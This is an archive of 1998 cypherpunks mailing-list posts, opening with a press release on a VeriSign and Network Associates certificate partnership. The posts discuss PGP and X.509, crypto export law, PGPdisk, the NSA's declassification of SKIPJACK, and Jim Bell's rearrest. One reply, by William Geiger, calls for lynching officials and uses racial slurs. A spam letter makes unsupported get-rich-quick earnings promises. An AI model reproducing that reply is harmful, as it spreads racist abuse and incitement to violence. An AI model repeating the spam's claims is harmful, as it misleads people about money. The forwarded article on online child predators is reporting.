NETWORK ASSOCIATES AND VERISIGN PARTNER TO PROVIDE INTEROPERABLE
6/22/98 13:18


         Digital Certificate Solutions to Millions of Users Worldwide

    Partnership Provides Customers Choice of Leading Certificate Formats,
          Enabling Widespread Secure Internet Business Transactions

    MOUNTAIN VIEW and SANTA CLARA, Calif., June 22 /PRNewswire/ --
VeriSign,
Inc. (Nasdaq: VRSN), and Network Associates (Nasdaq: NETA), today announced
a
broad reaching partnership to enable cross product support and promotion of

each company's digital certificate-based security solutions.  This
partnership
will provide customers with a flexible security solution that encompasses
best-of-breed products and technologies -- enabling secure global
electronic
commerce and business-to-business communications on a larger scale than
ever
before.  With this announcement, Network Associates and VeriSign can tap
into
the world's largest community of certificate holders made up of over one
thousand five hundred enterprises and nearly nine million individuals
throughout the world.
    This integration of the world's leading certificate technologies will
enable businesses to utilize their choice of certificate formats while
conducting secure Internet transactions such as:  exchanging secure e-mail,
establishing virtual private networks, and authorized access to
confidential
corporate data.  Network Associates and VeriSign customers will now be able
to
establish combined PKI solutions covering the complete lifecycle of
certificates from issuance and usage through renewal, expiration, or
revocation.  The first commercial offering from this collaboration will be
interoperable between the Gauntlet GVPN product and VeriSign OnSite for
IPSEC,
which will be available in the third quarter.  In the fourth quarter
VeriSign's OnSite service and toolkit will be enhanced to issue DSA X.509
certificates in addition to its RSA X.509 certificates, and Network
Associates' Net Tools Secure, including their industry leading PGP
encryption
products, will be updated to request and use either type of certificate.
    "By joining the two largest players in the industry to ensure that our
customers' security applications are seamlessly compatible, we are fueling
the
growth of electronic commerce and secure communications on the Internet,"
said
Peter Watkins general manager of the Net Tools Secure division at Network
Associates.  "We are pleased to offer VeriSign as our preferred provider of
digital certificate services.  Together, we are the only two companies to

support the full range of certificate standards -- giving customers the
power
of choice when implementing their open, certificate-based security
solutions."
    "We are extremely pleased to work with Network Associates to bring
enterprise customers a clear best-of-breed solution," said Stratton
Sclavos,
president and CEO of VeriSign.  "With this partnership, users of Network
Associates' desktop and server encryption applications can simply obtain
their
choice of digital certificates to establish a fully functional,
interoperable
PKI through the use of OnSite."
    "The announcement from VeriSign and Network Associates is a win-win
situation for Information Systems (IS) decision makers," said Jim Hurley,
director of information security at Aberdeen Group, a Boston-based IS
market-research, consulting and analysis firm.  "One supplier helps IS
managers by managing risk while the other helps IS managers by enabling
safe
interconnections with suppliers, partners and customers for mission
business-procedures.  Interoperable and seamless support between these
supplier's products is the kind of partnership that IS executives will
reward."
    VeriSign OnSite, a state of the art digital certificate solution that
enables organizations to quickly and easily establish themselves as a
certificate authority, is available today for client and server digital
certificates and will be available for IPSec digital certificates in the
third
quarter.  VeriSign OnSite pricing begins at $4995 for 1000 client
certificates.
    Network Associates' Net Tools Secure suite is the industry's most
comprehensive set of security products encompassing enterprise encryption,
authentication, intrusion detection, audit analysis, anti-virus, firewall,
global virtual private network and network vulnerability assessment.  Net
Tools Secure is available now and is priced at $49 per user for 5000 users.

    Network Associates, Inc.
    With headquarters in Santa Clara, California, Network Associates, Inc.,
formed by the merger of McAfee Associates and Network General, is a leading
supplier of enterprise network security and management solutions. Network
Associates' Net Tools Secure and Net Tools Manager offer
best-of-breed, suite-based network security and management solutions.  Net
Tools Secure and Net Tools Manager suites combine to create Net Tools,
which
centralizes these point solutions within an easy-to-use, integrated systems

management environment. For more information, Network Associates can be
reached at 408-988-3832 or on the Internet at http://www.nai.com.
    VeriSign, Inc. is the leading provider of digital certificate solutions
used by enterprises, Web sites and consumers to conduct secure
communications
and transactions over the Internet and private networks. VeriSign's Digital
IDs and Secure Server IDs are available through the company's Web site at
http://www.verisign.com.  VeriSign's E-Commerce Solutions are used by
enterprises to deploy complete Public Key Infrastructure (PKI) solutions
for
intranets, extranets, and large-scale electronic commerce applications, and
are available through VeriSign regional account representatives or through
VeriSign resellers.  For more information visit VeriSign's Web site at
http://www.verisign.com.

SOURCE  Network Associates, Inc.
    -0-                             06/22/98
    /CONTACT:  Nathan Tyler of Copithorne & Bellows, 415-975-2223, for
Network
Associates; or Kelly Ryan of VeriSign, 650-429-3424/
    /Company News On-Call:  http://www.prnewswire.com or fax, 800-758-5804,
ext. 124004/
    /Web site:  http://www.verisign.com
                http://www.nai.com/
    (NETA VRSN)

CO:  Network Associates, Inc.; VeriSign, Inc.
ST:  California
IN:  CPR MLM
SU:  PDT









-0- (PRN) Jun/22/98   13:03
EOS   (PRN)    Jun/22/98    13:03      86

-0- (PRN) Jun/22/  98   13:18






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Orrin" <privsoft@ix.netcom.com>
Date: Mon, 22 Jun 1998 16:20:14 -0700 (PDT)
To: "Cypherpunks Algebra" <cypherpunks@algebra.com>
Subject: Entrust goes Public
Message-ID: <199806222319.SAA04946@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3993.1071713789.multipart/mixed"

--Boundary..3993.1071713789.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit


> Entrust filed to go public. 

--Boundary..3993.1071713789.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "ENTRUST TECHNOLOGIES INC (Internet Shortcut)"

W0ludGVybmV0U2hvcnRjdXRdClVSTD1odHRwOi8vd3d3MS5mcmVlZWRnYXIu
Y29tL3NlYXJjaC9WaWV3RmlsaW5ncy5hc3A/Q0lLPTEwMzEyODMmRGlyZWN0
b3J5PTkyNzAxNiZZZWFyPTk4JlNFQ0luZGV4PTI0NjgmRXh0ZW5zaW9uPS50
c3QmUGF0aEZsYWc9MCZUZXh0RmlsZVNpemU9MTU5NjIyNyZTRlR5cGU9JlNE
RmlsZWQ9JkRhdGVGaWxlZD02LzE5Lzk4JlNvdXJjZVBhZ2U9RmlsaW5nc1Jl
c3VsdHMmRm9ybVR5cGU9Uy0xJkNvbXBhbnlOYW1lPUVOVFJVU1RfVEVDSE5P
TE9HSUVTX0lOQyZPRU1Tb3VyY2U9CgAAAAAAAIivSAA=
--Boundary..3993.1071713789.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin C Sweitzer <msew+@andrew.cmu.edu>
Date: Mon, 22 Jun 1998 17:23:58 -0700 (PDT)
To: msew+@andrew.cmu.edu>
Subject: export Laws regarding less than 40 bit encryption
In-Reply-To: <D104150098E6D111B7830000F8D90AE80178D9@exna02.securitydynamics.com>
Message-ID: <cpXjIvW00YUt01BrI0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone point me to a document that clearly states the laws governing
the export of software with less than 40 bits worth of encryption. 

The ITAR made my head hurt.  (damn lawyers)



thanks

msew





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Date: Mon, 22 Jun 1998 22:49:41 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Subject: CTIA Daily News From WOW-COM - June 22, 1998
Message-ID: <199806230545.AAA07698@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon for the
most important news in wireless communications today.
========================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 23 Jun 1998 05:49:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Jim Bell Rearrested
Message-ID: <199806231248.IAA16982@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


JY note: The message below has not been authenticated. The writer claimed
no knowledge of the arrest at the time I spoke with him, which was 
after the date and time of the arrest given in the message. It's
possible he was withholding the information for publication or by
request of confidentiality. The message may be a forgery written
after seeing the messages at http://jya.com/jdb062198.htm. The IRS
has sent spam concerning Jim Bell before: http://jya.com/irs-spam.htm.

From: Anonymous 3
Date: Mon, 22 Jun 1998 23:31:33 EDT
To: jya@pipeline.com
Subject: Jim Bell and anon

John: 

This is [a journalist] whom you called today about Bell. He was
arrested at his parents' home in Vancouver Monday about 1:07 a.m. PDT by five
federal marshals in two cars. The agents went in with guns drawn and came out
with Bell's elderly parents, with whom they talked for a while. A few minutes
later, they brought out Jim, who was handcuffed in front, dressed in a blue T-
shirt and slacks. He was put in the back of a red Jeep, and then leg chained
by an agent. (I tried to ask one of the agents if Jim was going to be taken
directly to Tacoma - my assumption - but the agent was a typical marshals
service jerk and just told me to stay away.)

Jim was in the backseat for about 20 minutes and then two agents came out and
drove him away - after one agent accidentally set off the Jeep "wa-wa" siren -
...just as TV arrived. the other three agents remained in the house, looking
for "evidence," i assume.

I expect him to appear before a federal magistrate in Tacoma tomorrow
morning. His federal defender still has not been provided any paper by the
govt.

so, now yr up to date.

on another matter, I was curious abt the anonymous info sent you. i've been
trying to get an anon remailer for some time, but have been unsuccessful. got
any tips, advice or help?			







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 23 Jun 1998 08:47:20 -0700 (PDT)
To: John Young <cypherpunks@toad.com
Subject: Re: Jim Bell Rearrested
In-Reply-To: <199806231248.IAA16982@camel8.mindspring.com>
Message-ID: <v0401170fb1b577c6c216@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



So, is this in reference to his purported request to get access to
computers after his release?

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga
Philodox Financial Technology Evangelism
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
Philodox: <http://www.philodox.com>, e$: <http://www.shipwright.com/>
          <mailto: rah@philodox.com>     <mailto: rah@shipwright.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Tue, 23 Jun 1998 12:13:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: PGPdisk for win95/98?
Message-ID: <3.0.3.32.19980623121806.006ce848@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain


	



	Great, so I finally get around to checking PGP's betaweb, and to my
amazement, they finally have a beta version of PGPdisk for 95.  Too bad it
claims that I need to contact a sales rep, and when I follow their link, I
get nothing that would really point me in the right direction.  Any of you
manage to get your hands on a copy? 

	Currently, I am using bestcrypt NP with blowfish.  I am a little concerned
with this however, As I have never seen a crypto-review of the software,
and their website is not too forthcoming with technical details, or known
attacks.  Does anyone have information (or horror stories) from using
bestcrypt? 



---------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>       ICQ:746241
 jkthomson:  C181 991A 405C EAFB 2C46  79B5 B1DC DB78 8196 122D
 http://www.bigfoot.com/~ceildh           <keys> at pgp.mit.edu
---------------------------------------------------------------

You can lead a man to slaughter, but you can't make him think.
================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Date: Tue, 23 Jun 1998 10:42:49 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Subject: CTIA Daily News From WOW-COM
Message-ID: <199806231737.MAA29674@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon for the
most important news in wireless communications today.
========================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: juutoo91@jj008@drackin.com
Date: Tue, 23 Jun 1998 12:15:45 -0700 (PDT)
To: juutoo91@jj008@drackin.com
Subject: Creating Wealth In America
Message-ID: <199806232650RAA53408@adv01.ieighty.net>
MIME-Version: 1.0
Content-Type: text/plain


Creating Wealth in America

>From the desk of Robert Allen, The Author of 2 Mega Best-Sellers, Nothing Down
 and Creating  Wealth in America

San Diego, California 
 11:29 P.M.

"I can't sleep until I get this off my chest."

"I'm extremely frustrated".

Odds are that nine out of ten people who receive this letter will discard it without a second thought.  Yet, I know that I have discovered a secret that could change your financial life forever!  And I'm willing to share it with you for FREE.

     Do you want to end your money pressures forever?
     Do you want to double your income?
     Do you want to build an extra stream of income quickly?

If you answered yes, then let me show you how you can begin living your dreams, this year before it's too late.  I'll get right to the point.

As it says on the letterhead, my name is Robert Allen.  I'm famous for my two #1 New York Times best-selling books.  Nothing Down and Creating Wealth in America.  There are lots of millionaires who credit their success to one of my books or seminars.  So when I share this secret with you, I want you to know that I've done my homework.  Here it comes.

I have discovered what I believe is the perfect home-based business.

Although I'm well known for real-estate investment books and seminars, this new business has absolutely nothing to do with real-estate.  In fact, it's much easier and far less risky.  It involves:

-No employees
-Little risk
-Little start up cash
-It's so simple, anyone can do it

You could be earning $1,000 a week in as little as 90 days.  One person I know went from zero to $3,000 a week in 60 days.  That's $150,000 a year extra, hassle-free income!

In my 20 years of research, I can honestly say, "I've never seen a faster, easier way to create a stream of income".

I know this sounds too good to be true.  Frankly, I didn't believe it myself at first.  Finally, I agreed to check it out.  As a test, I selected a small group of people and introduced them to this incredible opportunity.  Almost immediately, many of them started earning profits.  Within a week, many were earning incomes of $4,000 per month in net cash flow.  Now, some of them are cashing checks for $3,000 a week.  And this is just the beginning!  Their earning potential could be unlimited!

Would you like to learn how to do that?  I'd love to show you how.  But only if you're interested enough to make one telephone call.  The number to call immediately is 1-888-267-4455.  It's a 3-minute, 24-hour recorded message.  This may be the answer you have been seeking.

Warmly,

Robert G. Allen

P.S.  I want to show you how to create extra streams of income quickly,
      Go to the phone and call now 1-888-267-4455.


// 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Tue, 23 Jun 1998 13:55:44 -0700 (PDT)
To: dc-stuff@dis.org
Subject: Re: Verisign & NAI Join Forces, PGP out the door? (fwd)
Message-ID: <Pine.LNX.3.96.980623131241.13141B-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain


This is what I was able to find out about the Verisign/NAI partnership.

-- Max Inux (MaxInux@bigfoot.com) UIN: 207447, http://khercs.chipware.net 
Strong Cryptography makes the world a safer place- PGP: 0x5CCFCA59
Or Kinky sex makes the world go round- Christie: Your in my sig too
^^ If Cryptography is outlawed,  only outlaws will have cryptography ^^

 

---------- Forwarded message ----------
Date: Tue, 23 Jun 1998 10:22:26 -0700
From: Jon Callas <jon@pgp.com>
To: Max Inux <maxinux@bigfoot.com>, Sean_Paswater@nai.com
Cc: chip@chipware.net, jon@pgp.com
Subject: Re: Verisign & NAI Join Forces, PGP out the door? (fwd)

At 08:10 PM 6/22/98 -0700, Max Inux wrote:
   Chip and Jon:
   
   Chip:  Have any insight into this or is this gonna be like the TIS scare
   w/ Key Escrow?
   
   Jon:  Since Chip will probably end up asking you or some of the other
   higher ups if he is unsure, Is there any truth to this story, or is this
   TIS #2?
   
The tale is true -- it's the *interpretation* that's bogus. PGP is not out
the door. PGP will be doing X.509 too. There's not a lot of difference
between an X.509 certificate and a PGP key signature. They do the same
thing. What you'll be able to do is have Verisign sign your key. The first
steps of this are coming this fall -- you'll be able to drop an X.509 cert
into your keyring and it will magically transform itself into a PGP key. At
first, you'll only be able to use it with TLS (a.k.a. SSL), which is also
coming this fall. 

	Jon



-----
Jon Callas                                  jon@pgp.com
CTO, Total Network Security                 3965 Freedom Circle
Network Associates, Inc.                    Santa Clara, CA 95054
(408) 346-5860                              
Fingerprints: D1EC 3C51 FCB1 67F8 4345 4A04 7DF9 C2E6 F129 27A9 (DSS)
              665B 797F 37D1 C240 53AC 6D87 3A60 4628           (RSA)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Tue, 23 Jun 1998 13:55:40 -0700 (PDT)
To: jkthomson <jkthomson@bigfoot.com>
Subject: Re: PGPdisk for win95/98?
In-Reply-To: <3.0.3.32.19980623121806.006ce848@dowco.com>
Message-ID: <Pine.LNX.3.96.980623132835.13152C-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain


No horror stories of bestcrypt, but I hear that PGPdisk is damn dope,
except for two things.  The crypto 'file/partition/whatever' is static in
size, not dynamic, and it does _not_ use your pgp key.. But it looks like
it should still be neat.. I still like CFS for  linux :-)

-- Max Inux (MaxInux@bigfoot.com) UIN: 207447, http://khercs.chipware.net 
Strong Cryptography makes the world a safer place- PGP: 0x5CCFCA59
Or Kinky sex makes the world go round- Christie: Your in my sig too
^^ If Cryptography is outlawed,  only outlaws will have cryptography ^^

 

On Tue, 23 Jun 1998, jkthomson wrote:

> 
> 	
> 
> 
> 
> 	Great, so I finally get around to checking PGP's betaweb, and to my
> amazement, they finally have a beta version of PGPdisk for 95.  Too bad it
> claims that I need to contact a sales rep, and when I follow their link, I
> get nothing that would really point me in the right direction.  Any of you
> manage to get your hands on a copy? 
> 
> 	Currently, I am using bestcrypt NP with blowfish.  I am a little concerned
> with this however, As I have never seen a crypto-review of the software,
> and their website is not too forthcoming with technical details, or known
> attacks.  Does anyone have information (or horror stories) from using
> bestcrypt? 
> 
> 
> 
> ---------------------------------------------------------------
>  james 'keith' thomson <jkthomson@bigfoot.com>       ICQ:746241
>  jkthomson:  C181 991A 405C EAFB 2C46  79B5 B1DC DB78 8196 122D
>  http://www.bigfoot.com/~ceildh           <keys> at pgp.mit.edu
> ---------------------------------------------------------------
> 
> You can lead a man to slaughter, but you can't make him think.
> ================================================================
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 23 Jun 1998 10:49:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Jim Bell Rearrested 2
In-Reply-To: <199806231248.IAA16982@camel8.mindspring.com>
Message-ID: <199806231749.NAA16701@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The message about Jim's rearrest yesterday is confirmed,
except the time of arrest was 1:07 PM, not AM. The reporter
went by Jim's house after confirming that a bust was scheduled
and waited for the action.

Jim's been taken from Vancouver, WA, where he lives with his
parents, to either Spokane or Seattle, for a hearing before
a magistrate on the alleged parole violation. Jim's public
defender is on the matter.

No information on Jim's alleged violation, although the reporter
says supposedly there's a long list of prohibitions including one 
against going near a federal facility, "even a mailbox." 

Someone's trying to a get a copy of the list which should be 
public information.

Jim's appeal with the Ninth Circuit Court is presumably for 
reduction of the onerous prohibitions which may have
been made sever enough that he could be hauled in
whenever publicity is needed in the lucrative fight against 
"terrorism of the American people," a fever for funding that's 
feeding bucks into the bottomless pockets of US Justus 
Terrorists coming to call.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 23 Jun 1998 12:10:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA Declassifies Algos
Message-ID: <199806231910.PAA29551@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Ed Roback, NIST:


http://www.defenselink.mil/news/Jun1998/b06231998_bt316-98.html

DoD Press Release, June 23, 1998:

No. 316-78
IMMEDIATE RELEASE
June 23, 1998
(703)695-0192(media)
(703)697-5737(public/industry)

           ENCRYPTION FORMULAS DECLASSIFIED

The Department of Defense today announced the decision by the 
National Security Agency to declassify both the Key Exchange 
Algorithm and the SKIPJACK encryption algorithm used in the 
FORTEZZA(tm) personal computer card. FORTEZZA(tm) provides 
security at the desktop in the Defense Message System and other 
DoD applications. This marks the first time that the NSA has 
declassified such information and made it commercially available. 

This declassification is an essential part of the Department of 
Defense's efforts to work with commercial industry in developing 
reasonably priced computer protection products. This 
declassification decision will enable industry to develop software 
and smartcard based security products, which are interoperable 
with FORTEZZA(tm). The availability of such products will enhance 
the protection of DoD's sensitive but unclassified and critical 
non-mission communications. 

The decision to release SKIPJACK (an 80 bit encryption algorithm 
that is not extensible to higher key lengths) and KEA (a 1024 bit 
key exchange algorithm) is restricted to these particular 
algorithms, and does not apply to other classified NSA algorithms. 
The SKIPJACK and KEA algorithms and their source codes have been 
declassified pursuant to Executive Order 12958. 

Vendors interested in obtaining more information on this matter 
should contact the National Security Agency Public Affairs Office 
at 301-688-6524. 

[End]

-----

Note: We called NSA Public Affairs who said that more information 
will be available tomorrow afternoon on NIST's Web site (no specific 
URL):

   http://www.nist.gov

In the meantime NSA will respond to faxed questions; send to:

   Vanessa Talieri
   Office of Public Affairs
   National Security Agency
   Fax: 301-497-2844






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex `Taker` Pircher <pircher@informatik.tu-muenchen.de>
Date: Tue, 23 Jun 1998 10:02:41 -0700 (PDT)
To: pircher@informatik.tu-muenchen.de
Subject: Anonymicer
Message-ID: <358FDF49.4AC1@informatik.tu-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


Protect your Privacy for FREE!

http://anonymicer.home.ml.org/
(or http://anonymicer.home.pages.de/)

* Surf anonymously         -  http://anonymicer.home.ml.org/
* Send anonymous Emails    -  http://anonymicer.home.ml.org/email/
* Post anonymous Messages
  into Newsgroups          -  http://anonymicer.home.ml.org/news/

Fast - Easy - Free

Greetz,
 Taker

 pircher@informatik.tu-muenchen.de




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 23 Jun 1998 16:11:27 -0700 (PDT)
To: Max Inux <maxinux@bigfoot.com>
Subject: Re: Verisign & NAI Join Forces, PGP out the door? (fwd)
In-Reply-To: <Pine.LNX.3.96.980623131241.13141B-100000@khercs.chipware.net>
Message-ID: <Pine.BSF.3.96.980623235326.12905F-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


The primary difference between X.509v3 vs. PGP keys is one of format, not
of function. There is nothing you can do in native PGP key format that you
can't do in X.509.

However, many companies mandate keys to be kept in X.509 format
for compatibility reasons (you can then put the key on a smartcard, etc.).
What this move will mean is that PGP will make further inroads into the
corporate world and that strong crypto will be used more widely.

Standardization is a Good Thing.

--Lucky

On Tue, 23 Jun 1998, Max Inux wrote:

> This is what I was able to find out about the Verisign/NAI partnership.
> 
> -- Max Inux (MaxInux@bigfoot.com) UIN: 207447, http://khercs.chipware.net 
> Strong Cryptography makes the world a safer place- PGP: 0x5CCFCA59
> Or Kinky sex makes the world go round- Christie: Your in my sig too
> ^^ If Cryptography is outlawed,  only outlaws will have cryptography ^^
> 
>  
> 
> ---------- Forwarded message ----------
> Date: Tue, 23 Jun 1998 10:22:26 -0700
> From: Jon Callas <jon@pgp.com>
> To: Max Inux <maxinux@bigfoot.com>, Sean_Paswater@nai.com
> Cc: chip@chipware.net, jon@pgp.com
> Subject: Re: Verisign & NAI Join Forces, PGP out the door? (fwd)
> 
> At 08:10 PM 6/22/98 -0700, Max Inux wrote:
>    Chip and Jon:
>    
>    Chip:  Have any insight into this or is this gonna be like the TIS scare
>    w/ Key Escrow?
>    
>    Jon:  Since Chip will probably end up asking you or some of the other
>    higher ups if he is unsure, Is there any truth to this story, or is this
>    TIS #2?
>    
> The tale is true -- it's the *interpretation* that's bogus. PGP is not out
> the door. PGP will be doing X.509 too. There's not a lot of difference
> between an X.509 certificate and a PGP key signature. They do the same
> thing. What you'll be able to do is have Verisign sign your key. The first
> steps of this are coming this fall -- you'll be able to drop an X.509 cert
> into your keyring and it will magically transform itself into a PGP key. At
> first, you'll only be able to use it with TLS (a.k.a. SSL), which is also
> coming this fall. 
> 
> 	Jon
> 
> 
> 
> -----
> Jon Callas                                  jon@pgp.com
> CTO, Total Network Security                 3965 Freedom Circle
> Network Associates, Inc.                    Santa Clara, CA 95054
> (408) 346-5860                              
> Fingerprints: D1EC 3C51 FCB1 67F8 4345 4A04 7DF9 C2E6 F129 27A9 (DSS)
>               665B 797F 37D1 C240 53AC 6D87 3A60 4628           (RSA)
> 
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 24 Jun 1998 01:01:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Banning privacy: A radical proposal
In-Reply-To: <19980624011241.15925.qmail@hades.rpini.com>
Message-ID: <199806240806.DAA022.63@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <19980624011241.15925.qmail@hades.rpini.com>, on 06/24/98 
   at 01:12 AM, Anonymous <nobody@remailer.ch> said:

>This came from Yahoo/ZDNet. Mr. Pappas suggests that we just ban
>anonymity and privacy to "protect the children." Now where have I heard
>that before? And yet again, the "Ethical Hackers Against Pedophilia"
>raise their heads, no pun intended.

To hell with the children!!

If we need anything in this country it is a good supply of hemp rope so
whenever one of these control freaks tries to wipe their ass with the
Constitution under the guise of "saving the children" they are immediately
dragged out by their heals and lynched on the spot!!

If they are so anxious to "save the children" why don't they ban all
automobiles? I don't have exact figures but I am sure 1,000's of children
die and 10,000's are injured every year in auto accidents. I am sure that
Detroit and the oil industry might have a few words against it not to
mention 100 million angry motorist.

And if they really want to save some children why don't they shut down the
multi-billion dollar infanticide industry known as abortion. Why are these
medical hacks allowed to do to children what they would be jailed for
doing to a dog? Perhaps because it serves nicely with the elitist goals of
population control (need to keep the number of niggers, bean pickers, and
white trash down to a controllable number) not to mention that their
pockets are well lined by the hacks.

If they were truly operating on moral principals one would think they
would go after that which causes the greatest harm to the most children.
But of course they don't. They have no more morality than a bitch in heat.
Their "save the children" bit is just a pre-emptive trump against any
opposition (how can you not be for saving children!!).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: I'm an OS/2 developer...I don't NEED a life!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNZCziI9Co1n+aLhhAQFCJgQAms7GyayB9pF3OMDHIrT+5Dp8TvXlkTRh
HBifHyMhTTnOIfsRryhXzgdM+20ALIVzWat0KSjnpW26e/JRnuIEnAN3B1pYcfVy
P//irI9EbVhAnYWt5hSwhxEOhZxYwUas+tUw7vKXioiK3LQw8iigWvs9HhP16Gpu
y+P+XpPxpxs=
=Nd63
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Tue, 23 Jun 1998 19:42:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Banning privacy: A radical proposal
Message-ID: <19980624011241.15925.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain




This came from Yahoo/ZDNet. Mr. Pappas suggests that we just ban anonymity
and privacy to "protect the children." Now where have I heard that before?
And yet again, the "Ethical Hackers Against Pedophilia" raise their heads,
no pun intended.

>Banning privacy: A radical proposal 
>
>By Charles Pappas 
>June 22, 1998 
>Yahoo! Internet Life 
>
>Copyright (c) 1998 ZDNet
>
>Privacy and anonymity are our most cherished tenets of online life. A
>need so immense that Marc Rotenberg of the Electronic Privacy
>Information Center declared that we might need a kind of Department of
>Privacy. He's not alone: 72 percent of surfers think there should be new
>laws to protect their privacy. 
>
>It's a radical, 180-degree turn to take, but...what if we're all wrong?
>What if this belief that privacy + anonymity = social good has become as
>self-destructive and delusional as a drunk who thinks one more scotch
>will make him feel better? 
>
>Like Marley's ghost, privacy may be coming back to haunt us. And that
>ghost's name is pedophilia. How bad is it? Disguised as a 13-year-old, I
>was directly propositioned on AOL in fewer than 10 minutes on each of
>six separate attempts. I entered a chat room--usually called something
>like "x9x10x11" or even "JonBenet Ramsey" (code words that alert
>pedophiles where to swarm)--and waited for the assaults to start. 
>
>Even when I didn't enter a chat room, the offers kept coming in from
>pedophiles prowling for victims. One wanted to send me pictures of
>himself. Another asked for a phone number. "I want to do my daughter,"
>one confessed to me. Later, when I searched for their screen names, they
>had all disappeared into the anonymous electronic mist. 
>
>AOL monitors kids' chat rooms continuously. (Parents can also set the
>AOL software so their children can't use chat rooms.) "We have a
>zero-tolerance policy when it comes to anything illegal," assures AOL
>spokeswoman Tricia Primrose. "We have about 8,000 monitors scanning up
>to 19,000 chat rooms, message boards, member profiles, and other areas.
>When we get any kind of complaint, we immediately check it out. And
>we're working with the FBI, customs, and other officials." 
>
>It's not just AOL, of course. Child molesters "operate on every avenue
>of the Net," says PhotonRain (not his real name) of Ethical Hackers
>Against Pedophilia, a group that aids law enforcement in combating child
>pornography. "WWW, newsgroups, IRC, ICQ, FTP servers..." 
>
>We already know it's widespread and easy to encounter. But how often
>have we heard--and parroted--the party line that problems on the Net
>just reflect real-world problems, no more and no less? Holland slays
>that sacred lamb: "The amount of pedophilia on the Net is extremely
>disproportional to...society as a whole. They hide behind the anonymity
>the Net offers. And they are aware of the small odds against being
>caught." 
>
>Ruben Rodriguez, director of the Exploited Child unit for the National
>Center for Missing & Exploited Children (NCMEC), concurs: "The Net is so
>anonymous that molesters are very comfortable on it. They can go in and
>hunt kids down, and attempt five or six seductions at the same time." 
>
>"Let's face it," says a New York State investigator who requests
>anonymity, "the Net's anonymity enables the sickness. In a couple of
>hours I could easily get 2,000 pictures if I wanted, including the Baby
>Rape series," a popular collection of pedophilia photos whose name is
>horrifyingly self-explanatory. 
>
